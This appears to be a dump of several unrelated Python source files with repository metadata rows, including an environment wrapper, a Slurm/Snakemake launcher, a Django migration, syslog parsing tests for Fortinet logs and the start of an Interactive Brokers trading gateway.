- :math:`h_O` and :math:`w_O` are the height and width of the output
image.
Args:
x (:class:`~chainer.Variable` or :ref:`ndarray`):
Input variable of shape :math:`(n, c_I, h, w)`.
output_shape (tuple): This is a tuple of length 2 whose values are
:obj:`(h_O, w_O)`. Note that the order of height and width is
opposite of the one in OpenCV.
Returns:
~chainer.Variable: Resized image whose shape is \
:math:`(n, c_I, h_O, w_O)`.
"""
return ResizeImages(output_shape).apply((x,))[0]
| 31.879195 | 79 | 0.542316 |
795bafe32cae3f6857cf4c37a329a860c727431e | 760 | py | Python | pddlrl/wrappers/preprocess.py | IBM/pddlrl | e057cc67426c91c9180286a67acad5b9a1ba7fc6 | [
"MIT"
] | 5 | 2022-03-24T16:47:21.000Z | 2022-03-25T16:04:04.000Z | pddlrl/wrappers/preprocess.py | IBM/pddlrl | e057cc67426c91c9180286a67acad5b9a1ba7fc6 | [
"MIT"
] | null | null | null | pddlrl/wrappers/preprocess.py | IBM/pddlrl | e057cc67426c91c9180286a67acad5b9a1ba7fc6 | [
"MIT"
] | null | null | null | # This file is a part of PDDLRL project.
# Copyright (c) 2020 Clement Gehring (clement@gehring.io)
# Copyright (c) 2021 Masataro Asai (guicho2.71828@gmail.com, masataro.asai@ibm.com), IBM Corporation
from typing import Callable
from acme.wrappers import base
import dm_env
class PreprocessWrapper(base.EnvironmentWrapper):
preprocess_fn: Callable[[dm_env.TimeStep], dm_env.TimeStep]
def __init__(self, environment, preprocess_fn):
self.preprocess_fn = preprocess_fn
super().__init__(environment)
def reset(self):
timestep = self._environment.reset()
return self.preprocess_fn(timestep)
def step(self, action):
timestep = self._environment.step(action)
return self.preprocess_fn(timestep)
| 29.230769 | 100 | 0.728947 |
795bb03c61f00c2afaef15536993e97a18bf2ef4 | 3,360 | py | Python | kslurm/cli/ssnake.py | pvandyken/kslurm | ae67b6de9e93b991274a36bfc5b2d6272320d7e6 | [
"MIT"
] | 1 | 2021-09-27T23:44:40.000Z | 2021-09-27T23:44:40.000Z | kslurm/cli/ssnake.py | pvandyken/kslurm | ae67b6de9e93b991274a36bfc5b2d6272320d7e6 | [
"MIT"
] | 10 | 2021-09-17T01:08:05.000Z | 2021-10-21T01:46:39.000Z | kslurm/cli/ssnake.py | pvandyken/kslurm | ae67b6de9e93b991274a36bfc5b2d6272320d7e6 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
# import itertools as it
# import subprocess
# import sys
# from pathlib import Path
# import attr
# from colorama import Fore, Style
# from kslurm.args.arg_types import PositionalArg
# from kslurm.exceptions import ValidationError
# from kslurm.models import SlurmModel
# from kslurm.slurm import SlurmCommand
# # Helper function for formatting the list of settings in our output
# def setting_list(name: str, setting: str) -> str:
# return (
# Fore.YELLOW
# + name
# + ": "
# + Fore.WHITE
# + Style.BRIGHT
# + setting
# + Style.RESET_ALL
# )
# def profile_validator(profile: str) -> str:
# profile_path = Path.home() / ".config" / "snakemake"
# configfiles = [profile_path.glob(f"*/config.{ext}") for ext in ["yml", "yaml"]]
# profiles = [configfile.parent.name for configfile in it.chain(*configfiles)]
# if profile in profiles:
# return profile
# if profiles:
# profiles = "\n".join(profiles)
# profilelist = f"Found the following profiles:\n{profiles}"
# else:
# profilelist = f"Did not find any valid profiles in {profile_path}"
# raise ValidationError(
# f'{Fore.RED}"{Fore.LIGHTRED_EX + profile + Fore.RED}" '
# f"is not a valid profile.{Fore.RESET} \n\n{profilelist}"
# )
# # Extended Model
# @attr.s(auto_attribs=True)
# class SSnakeModel(SlurmModel):
# profile: PositionalArg[str] = PositionalArg(validator=profile_validator)
# def main():
# models = SSnakeModel()
# models.cpu.value = "2"
# models.profile
# slurm = SlurmCommand(sys.argv[1:], models)
# # Get the profile
# profile = slurm.args.profile.value
# # Use parent directory name as the job name
# slurm.name = Path.cwd().name
# slurm.output = "snakemake-%j.out"
# # Update our submission script
# slurm.script = [
# "source $SNAKEMAKE_VENV_DIR/activate",
# "panoptes --ip $(hostname -f) 1> panoptes.out 2>&1 &",
# "PANOPTES_PID=$!",
# '(tail -F panoptes.out & ) | grep -q "Running on"',
# "hostname -f",
# 'snakemake --wms-monitor "http://$(hostname -f):5000" '
# f"--profile {profile} {slurm.command}",
# "kill $PANOPTES_PID",
# "rm panoptes.out",
# ]
# # Run the process and collect the jobid output.
# output = subprocess.run(
# slurm.batch, shell=True, capture_output=True
# ).stdout.decode()
# if slurm.test:
# # output will be the issued command, so we print it
# print(Fore.WHITE + output)
# else:
# # We subtract the last 2 characters of the output
# # to remove the final "\n" characters and get the
# # job_id
# slurmid = output[:-2]
# # Print a helpful confirmation message
# print(
# f"""
# {Fore.GREEN}Scheduling Snakemake
# {Fore.LIGHTBLUE_EX}SETTINGS
# {Fore.WHITE}{slurm.slurm_args}
# {setting_list("profile", profile)}
# {setting_list("job_name", slurm.name)}
# {setting_list("job_id", slurmid)}
# {setting_list("other_args", slurm.command)}
# To cancel the job, run:
# scancel {slurmid}
# """
# )
# if __name__ == "__main__":
# main()
| 29.734513 | 85 | 0.596131 |
795bb07372febc7b18fb41970b6f61137725a836 | 80 | py | Python | src/db/__init__.py | tws0002/footage-importer | a797b79efa184167ca472369b07d1a029dd86cbd | [
"MIT"
] | null | null | null | src/db/__init__.py | tws0002/footage-importer | a797b79efa184167ca472369b07d1a029dd86cbd | [
"MIT"
] | null | null | null | src/db/__init__.py | tws0002/footage-importer | a797b79efa184167ca472369b07d1a029dd86cbd | [
"MIT"
] | null | null | null | from .parse_path import parse_path
from .import_resource import import_resource
| 26.666667 | 44 | 0.875 |
795bb07d4422db925f4ccb2386c5e1a195e5dd45 | 1,711 | py | Python | tests/nfe_reader/ba/test_crawler.py | jroquejr/nfe-reader | 277379bfb9865b2656c2576d8ccf8c3e1f3cacd1 | [
"MIT"
] | null | null | null | tests/nfe_reader/ba/test_crawler.py | jroquejr/nfe-reader | 277379bfb9865b2656c2576d8ccf8c3e1f3cacd1 | [
"MIT"
] | 2 | 2021-04-21T14:57:31.000Z | 2021-04-21T14:57:32.000Z | tests/nfe_reader/ba/test_crawler.py | jroquejr/nfe-reader | 277379bfb9865b2656c2576d8ccf8c3e1f3cacd1 | [
"MIT"
] | null | null | null | import re
import pytest
import requests_mock
from nfe_reader.ba.crawler import Crawler
from nfe_reader.exceptions import InvalidQRCode, UnavailableServerException
from tests.util import load_file
FAKE_URL = "http://nfe.sefaz.ba.gov.br/servicos/nfce/qrcode.aspx?p=29190710230480000300650020046429391067584521|2|1|1|02DEF8AF9895079E1B6C439CD83A91A04E0F04E0"
def test_ba_crawler(html_first_page, html_nfe, html_emitter, html_products):
with requests_mock.mock() as m:
m.register_uri("GET", re.compile("qrcode.aspx"), text=html_first_page)
m.register_uri("POST", re.compile("NFCEC_consulta_danfe.aspx"), text=html_nfe)
m.register_uri(
"POST",
re.compile("NFCEC_consulta_abas.aspx"),
[{"text": html_emitter}, {"text": html_products}],
)
crawler = Crawler()
result = crawler.search_by_qrcode(FAKE_URL)
assert result
def test_server_failed(html_server_error):
with requests_mock.mock() as m:
m.register_uri("GET", re.compile("qrcode.aspx"), text=html_server_error)
crawler = Crawler()
with pytest.raises(UnavailableServerException):
crawler.search_by_qrcode(FAKE_URL)
@pytest.mark.parametrize(
"fixture,exception_class",
[
("crawler_ba/server-error.html", UnavailableServerException),
("crawler_ba/qrcode-error.html", InvalidQRCode),
],
)
def test_server_errors(fixture, exception_class):
html = load_file(fixture)
with requests_mock.mock() as m:
m.register_uri("GET", re.compile("qrcode.aspx"), text=html)
crawler = Crawler()
with pytest.raises(exception_class):
crawler.search_by_qrcode(FAKE_URL)
| 33.54902 | 159 | 0.703098 |
795bb0c5076a1977a9004f4f381d1a399497b37c | 721 | py | Python | cms/run_traj.py | broadinstitute/cms | 4743ffd3feac08f02be7719c82b3371cb94a4d6b | [
"BSD-2-Clause"
] | 13 | 2015-05-18T14:39:00.000Z | 2020-07-22T12:57:07.000Z | cms/run_traj.py | broadinstitute/cms | 4743ffd3feac08f02be7719c82b3371cb94a4d6b | [
"BSD-2-Clause"
] | 33 | 2015-04-13T20:48:02.000Z | 2019-12-19T07:27:30.000Z | cms/run_traj.py | broadinstitute/cms | 4743ffd3feac08f02be7719c82b3371cb94a4d6b | [
"BSD-2-Clause"
] | 9 | 2016-03-31T06:56:01.000Z | 2020-01-30T16:35:45.000Z | ## relaunches cosi command until a selection trajectory is created successully (i.e., resampling selection coefficients/sweep start times from specified distributions)
## last updated: 08.15.16 vitti@broadinstitute.org NIX 3.12
import sys
import subprocess
output, cosibuild, params, maxAttempts = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
commandstring = "env COSI_NEWSIM=1 COSI_MAXATTEMPTS=" + str(maxAttempts) + " COSI_SAVE_TRAJ=" + output + " " + cosibuild + " -p " + params
itWorked = False
nAttempts = 0
while itWorked == False:
nAttempts +=1
try:
subprocess.check_output(commandstring.split())
except:
continue
itWorked = True
print("found a trajectory in " + str(nAttempts) + " attempts.") | 36.05 | 167 | 0.736477 |
795bb2483680237df7b816a6450386669ceeaf02 | 1,512 | py | Python | blog/migrations/0001_initial.py | inoxidables/tienda | 994a36368da94b069e0948c52192c734eb22ddc4 | [
"MIT"
] | null | null | null | blog/migrations/0001_initial.py | inoxidables/tienda | 994a36368da94b069e0948c52192c734eb22ddc4 | [
"MIT"
] | null | null | null | blog/migrations/0001_initial.py | inoxidables/tienda | 994a36368da94b069e0948c52192c734eb22ddc4 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.3 on 2021-10-22 13:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Categoria',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=50)),
],
options={
'verbose_name': 'categoria',
'verbose_name_plural': 'categorias',
},
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('titulo', models.CharField(max_length=50)),
('contenido', models.CharField(max_length=50)),
('imagen', models.ImageField(blank=True, null=True, upload_to='blog')),
('autor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('categorias', models.ManyToManyField(to='blog.Categoria')),
],
options={
'verbose_name': 'post',
'verbose_name_plural': 'posts',
},
),
]
| 34.363636 | 119 | 0.56746 |
795bb2d1e903f35a3e8882fb8a717e9022c69ea8 | 11,535 | py | Python | tests/test_fortinet_ngfw.py | melscoop-test/ghcr-test-401-1276973 | f3ab152d8408dd77a9f279e4e2e9b41c8a04e82f | [
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null | tests/test_fortinet_ngfw.py | melscoop-test/ghcr-test-401-1276973 | f3ab152d8408dd77a9f279e4e2e9b41c8a04e82f | [
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null | tests/test_fortinet_ngfw.py | melscoop-test/ghcr-test-401-1276973 | f3ab152d8408dd77a9f279e4e2e9b41c8a04e82f | [
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null | # Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
import random
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
# env = Environment(extensions=['jinja2_time.TimeExtension'])
env = Environment()
# <111> Aug 17 00:00:00 fortigate date=2015-08-11 time=19:19:43 devname=Nosey devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf="port3" dstip=ff02::1:ff77:20d4 dstintf="port3" sessionid=408903 proto=58 action=accept policyid=2 dstcountry="Reserved" srccountry="Reserved" trandisp=snat transip=:: transport=0 service="icmp6/131/0" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app="IPv6.ICMP" appcat="Network.Service" apprisk=elevated applist="sniffer-profile" appact=detected utmaction=allow countapp=1
def test_fortinet_fgt_event(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
# "{{ mark }} {{ bsd }} fortigate date={{ date }} time={{ time }} devname={{ host }} devid=FGT60D4614044725 logid=0100040704 type=event subtype=system level=notice tz=\"{{ tzoffset }}\" vd=root logdesc=\"System performance statistics\" action=\"perf-stats\" cpu=2 mem=35 totalsession=61 disk=2 bandwidth=158/138 setuprate=2 disklograte=0 fazlograte=0 msg=\"Performance statistics: average CPU: 2, memory: 35, concurrent sessions: 61, setup-rate: 2\"\n")
"{{ mark }} {{ bsd }} fortigate date={{ date }} time={{ time }} devname={{ host }} devid=FGT60D4614044725 logid=0100040704 type=event subtype=system level=notice vd=root logdesc=\"System performance statistics\" action=\"perf-stats\" cpu=2 mem=35 totalsession=61 disk=2 bandwidth=158/138 setuprate=2 disklograte=0 fazlograte=0 msg=\"Performance statistics: average CPU: 2, memory: 35, concurrent sessions: 61, setup-rate: 2\"\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
"search _time={{ epoch }} index=netops host=\"{{ host }}\" sourcetype=\"fgt_event\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
# <111> Aug 17 00:00:00 fortigate date=2015-08-11 time=19:19:43 devname=Nosey devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf="port3" dstip=ff02::1:ff77:20d4 dstintf="port3" sessionid=408903 proto=58 action=accept policyid=2 dstcountry="Reserved" srccountry="Reserved" trandisp=snat transip=:: transport=0 service="icmp6/131/0" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app="IPv6.ICMP" appcat="Network.Service" apprisk=elevated applist="sniffer-profile" appact=detected utmaction=allow countapp=1
def test_fortinet_fgt_traffic(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }} {{ bsd }} fortigate date={{ date }} time={{ time }} devname={{ host }} devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf=\"port3\" dstip=ff02::1:ff77:20d4 dstintf=\"port3\" sessionid=408903 proto=58 action=accept policyid=2 dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=snat transip=:: transport=0 service=\"icmp6/131/0\" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app=\"IPv6.ICMP\" appcat=\"Network.Service\" apprisk=elevated applist=\"sniffer-profile\" appact=detected utmaction=allow countapp=1\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
"search _time={{ epoch }} index=netfw host=\"{{ host }}\" sourcetype=\"fgt_traffic\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
# <111> Aug 17 00:00:00 fortigate date=2015-08-11 time=19:21:40 logver=52 devname=US-Corp_Main1 devid=FGT37D4613800138 logid=0317013312 type=utm subtype=webfilter eventtype=ftgd_allow level=notice vd=root sessionid=1490845588 user="" srcip=172.30.16.119 srcport=53235 srcintf="Internal" dstip=114.112.67.75 dstport=80 dstintf="External-SDC" proto=6 service=HTTP hostname="popo.wan.ijinshan.com" profile="scan" action=passthrough reqtype=direct url="/popo/launch?c=cHA9d29vZHMxOTgyQGhvdG1haWwuY29tJnV1aWQ9NDBiNDkyZDRmNzdhNjFmOTNlMjQwMjhiYjE3ZGRlYTYmY29tcGl" sentbyte=525 rcvdbyte=325 direction=outgoing msg="URL belongs to an allowed category in policy" method=domain cat=52 catdesc="Information Technology"
def test_fortinet_fgt_utm(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }} {{ bsd }} fortigate date={{ date }} time={{ time }} devname={{ host }} devid=FGT37D4613800138 logid=0317013312 type=utm subtype=webfilter eventtype=ftgd_allow level=notice vd=root sessionid=1490845588 user=\"\" srcip=172.30.16.119 srcport=53235 srcintf=\"Internal\" dstip=114.112.67.75 dstport=80 dstintf=\"External-SDC\" proto=6 service=HTTP hostname=\"popo.wan.ijinshan.com\" profile=\"scan\" action=passthrough reqtype=direct url=\"/popo/launch?c=cHA9d29vZHMxOTgyQGhvdG1haWwuY29tJnV1aWQ9NDBiNDkyZDRmNzdhNjFmOTNlMjQwMjhiYjE3ZGRlYTYmY29tcGl\" sentbyte=525 rcvdbyte=325 direction=outgoing msg=\"URL belongs to an allowed category in policy\" method=domain cat=52 catdesc=\"Information Technology\"\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
"search _time={{ epoch }} index=netfw host=\"{{ host }}\" sourcetype=\"fgt_utm\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
# <111> date=2015-08-11 time=19:19:43 devname=Nosey devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf="port3" dstip=ff02::1:ff77:20d4 dstintf="port3" sessionid=408903 proto=58 action=accept policyid=2 dstcountry="Reserved" srccountry="Reserved" trandisp=snat transip=:: transport=0 service="icmp6/131/0" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app="IPv6.ICMP" appcat="Network.Service" apprisk=elevated applist="sniffer-profile" appact=detected utmaction=allow countapp=1
def test_fortinet_fgt_traffic_framed(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}date={{ date }} time={{ time }} devname={{ host }} devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf=\"port3\" dstip=ff02::1:ff77:20d4 dstintf=\"port3\" sessionid=408903 proto=58 action=accept policyid=2 dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=snat transip=:: transport=0 service=\"icmp6/131/0\" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app=\"IPv6.ICMP\" appcat=\"Network.Service\" apprisk=elevated applist=\"sniffer-profile\" appact=detected utmaction=allow countapp=1\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
message_len = len(message)
ietf = f"{message_len} {message}"
sendsingle(ietf, setup_sc4s[0], setup_sc4s[1][601])
st = env.from_string(
"search _time={{ epoch }} index=netfw host=\"{{ host }}\" sourcetype=\"fgt_traffic\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
def test_fortinet_fgt_traffic_nohdr(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist),
random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}date={{ date }} time={{ time }} devname={{ host }} devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf=\"port3\" dstip=ff02::1:ff77:20d4 dstintf=\"port3\" sessionid=408903 proto=58 action=accept policyid=2 dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=snat transip=:: transport=0 service=\"icmp6/131/0\" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app=\"IPv6.ICMP\" appcat=\"Network.Service\" apprisk=elevated applist=\"sniffer-profile\" appact=detected utmaction=allow countapp=1\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
"search _time={{ epoch }} index=netfw host=\"{{ host }}\" sourcetype=\"fgt_traffic\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1 | 68.254438 | 721 | 0.723971 |
795bb344eefc7428612d184d46993b617f69b2f7 | 20,927 | py | Python | vnpy/gateway/ib/ib_gateway.py | JonnyORZ/vnpy | c3bb624d95625412a2dd593326abf3833321d2e2 | [
"MIT"
] | 11 | 2019-11-18T06:07:16.000Z | 2020-10-12T11:36:21.000Z | vnpy/gateway/ib/ib_gateway.py | dovnekai/vnpy | 222475fdf97f77f60cec4ecee231f1b85f44df21 | [
"MIT"
] | 2 | 2019-07-17T09:39:34.000Z | 2019-10-19T16:21:55.000Z | vnpy/gateway/ib/ib_gateway.py | dovnekai/vnpy | 222475fdf97f77f60cec4ecee231f1b85f44df21 | [
"MIT"
] | 6 | 2019-10-30T14:52:21.000Z | 2021-01-11T05:41:17.000Z | """
Please install ibapi from Interactive Brokers github page.
"""
from copy import copy
from datetime import datetime
from queue import Empty
from threading import Thread, Condition
from ibapi import comm
from ibapi.client import EClient
from ibapi.common import MAX_MSG_LEN, NO_VALID_ID, OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType
from ibapi.wrapper import EWrapper
from ibapi.errors import BAD_LENGTH
from ibapi.common import BarData as IbBarData
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
BarData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
Interval
)
ORDERTYPE_VT2IB = {
OrderType.LIMIT: "LMT",
OrderType.MARKET: "MKT",
OrderType.STOP: "STP"
}
ORDERTYPE_IB2VT = {v: k for k, v in ORDERTYPE_VT2IB.items()}
DIRECTION_VT2IB = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
EXCHANGE_VT2IB = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
Exchange.CFE: "CFE"
}
EXCHANGE_IB2VT = {v: k for k, v in EXCHANGE_VT2IB.items()}
STATUS_IB2VT = {
"ApiPending": Status.SUBMITTING,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
"Submitted": Status.NOTTRADED,
"ApiCancelled": Status.CANCELLED,
"Cancelled": Status.CANCELLED,
"Filled": Status.ALLTRADED,
"Inactive": Status.REJECTED,
}
PRODUCT_VT2IB = {
Product.EQUITY: "STK",
Product.FOREX: "CASH",
Product.SPOT: "CMDTY",
Product.OPTION: "OPT",
Product.FUTURES: "FUT",
}
PRODUCT_IB2VT = {v: k for k, v in PRODUCT_VT2IB.items()}
OPTION_VT2IB = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
CURRENCY_VT2IB = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
TICKFIELD_IB2VT = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
ACCOUNTFIELD_IB2VT = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
INTERVAL_VT2IB = {
Interval.MINUTE: "1 min",
Interval.HOUR: "1 hour",
Interval.DAILY: "1 day",
}
class IbGateway(BaseGateway):
""""""
default_setting = {
"TWS地址": "127.0.0.1",
"TWS端口": 7497,
"客户号": 1
}
exchanges = list(EXCHANGE_VT2IB.keys())
def __init__(self, event_engine):
""""""
super(IbGateway, self).__init__(event_engine, "IB")
self.api = IbApi(self)
def connect(self, setting: dict):
"""
Start gateway connection.
"""
host = setting["TWS地址"]
port = setting["TWS端口"]
clientid = setting["客户号"]
self.api.connect(host, port, clientid)
def close(self):
"""
Close gateway connection.
"""
self.api.close()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
self.api.cancel_order(req)
def query_account(self):
"""
Query account balance.
"""
pass
def query_position(self):
"""
Query holding positions.
"""
pass
def query_history(self, req: HistoryRequest):
""""""
return self.api.query_history(req)
class IbApi(EWrapper):
""""""
def __init__(self, gateway: BaseGateway):
""""""
super(IbApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.status = False
self.reqid = 0
self.orderid = 0
self.clientid = 0
self.ticks = {}
self.orders = {}
self.accounts = {}
self.contracts = {}
self.tick_exchange = {}
self.history_req = None
self.history_condition = Condition()
self.history_buf = []
self.client = IbClient(self)
self.thread = Thread(target=self.client.run)
def connectAck(self): # pylint: disable=invalid-name
"""
Callback when connection is established.
"""
self.status = True
self.gateway.write_log("IB TWS连接成功")
def connectionClosed(self): # pylint: disable=invalid-name
"""
Callback when connection is closed.
"""
self.status = False
self.gateway.write_log("IB TWS连接断开")
def nextValidId(self, orderId: int): # pylint: disable=invalid-name
"""
Callback of next valid orderid.
"""
super(IbApi, self).nextValidId(orderId)
self.orderid = orderId
def currentTime(self, time: int): # pylint: disable=invalid-name
"""
Callback of current server time of IB.
"""
super(IbApi, self).currentTime(time)
dt = datetime.fromtimestamp(time)
time_string = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg = f"服务器时间: {time_string}"
self.gateway.write_log(msg)
def error(
self, reqId: TickerId, errorCode: int, errorString: str
): # pylint: disable=invalid-name
"""
Callback of error caused by specific request.
"""
super(IbApi, self).error(reqId, errorCode, errorString)
msg = f"信息通知,代码:{errorCode},内容: {errorString}"
self.gateway.write_log(msg)
def tickPrice( # pylint: disable=invalid-name
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
):
"""
Callback of tick price update.
"""
super(IbApi, self).tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# Update name into tick data.
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# Forex and spot product of IDEALPRO has no tick time and last price.
# We need to calculate locally.
exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO:
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now()
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
): # pylint: disable=invalid-name
"""
Callback of tick volume update.
"""
super(IbApi, self).tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
): # pylint: disable=invalid-name
"""
Callback of tick string update.
"""
super(IbApi, self).tickString(reqId, tickType, value)
if tickType != "45":
return
tick = self.ticks[reqId]
tick.datetime = datetime.fromtimestamp(value)
self.gateway.on_tick(copy(tick))
def orderStatus( # pylint: disable=invalid-name
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
